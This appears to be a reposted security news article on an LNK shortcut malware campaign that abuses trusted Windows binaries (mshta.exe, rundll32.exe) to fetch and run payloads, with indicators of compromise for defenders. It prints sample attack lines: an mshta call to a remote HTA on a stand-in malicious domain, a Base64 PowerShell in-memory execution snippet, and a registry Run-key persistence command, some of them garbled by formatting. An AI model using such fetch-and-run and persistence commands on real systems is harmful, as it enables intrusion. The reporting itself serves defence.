A recent wave of attacks leveraging malicious Windows shortcut files (.LNK) has put security teams on high alert.
Emerging in late August 2025, this new LNK malware distribution exploits trusted Microsoft binaries to bypass endpoint protections and execute payloads without raising suspicions.
Delivered primarily via spear-phishing emails and compromised websites, the shortcut files appear innocuous, embedding commands that invoke legitimate Windows utilities to fetch and launch additional malware components.
Early victims have reported subtle indicators of compromise, such as anomalous PowerShell calls and unexpected network connections, often dismissed as benign system activity.
Researchers observed that the campaign targets both enterprise and consumer endpoints, focusing on users with elevated privileges.
The initial lure emails mimic internal IT notifications or security alerts, encouraging recipients to click on a seemingly harmless shortcut attachment.
Upon execution, the LNK file triggers Windows Explorer to load a hidden payload, effectively weaponizing built-in binaries like mshta.exe and rundll32.exe to stage the attack.
This technique enables the threat actor to evade antivirus signatures and behavioral detection rules that typically flag direct execution of unknown executables.
K7 Security Labs analysts noted that the attackers carefully crafted the LNK payload to leverage encoded parameters passed to these native utilities, preventing straightforward analysis by sandbox environments.
By chaining multiple benign processes, the malware achieves “living off the land” execution, reducing its forensic footprint on disk and in memory.
Victims’ endpoint logs show rapid process spawning events, where each process hands off execution to the next stage in under a second, complicating detection efforts.
Infection Mechanism and Payload Deployment
Diving deeper into the infection mechanism, the malicious .LNK file embeds an OLE object that points to a remote HTML application (HTA) script hosted on a compromised server.
When a user double-clicks the shortcut, Explorer invokes mshta.exe with the following command line:-
mshta.exe "http[:]//malicious-domain.com/loader.hta" .webp "New LNK Malware Uses Windows Binaries to Bypass Security Tools and Execute Malware 3")
Here the obfuscated loader script uses Base64-encoded PowerShell commands to download the next-stage payload:-
$payload = 'aGVsbG8gd29ybGQ='
IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))This snippet decodes and executes a simple script from memory, demonstrating how the attacker minimizes disk writes.
Once the HTA executes, it leverages rundll32.exe to load a malicious DLL directly into a suspended svchost.exe process, bypassing executable file scanning.
The DLL is responsible for establishing persistence by creating a Win32 registry run key:-
HKCU:SoftwareMicrosoftWindowsCurrentVersionRun -Name "Updater" -Value "rundll32.exe C:WindowsTempupdater.dll,EntryPoint"By abusing registry-based persistence and trusted Windows binaries, the malware ensures that it launches automatically upon user login, even if endpoint detections attempt to quarantine the DLL file.
Indicators of compromise include network requests to suspicious domains, anomalous mshta.exe and rundll32.exe process trees, and unrecognized registry entries under the CurrentVersionRun key.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Source link
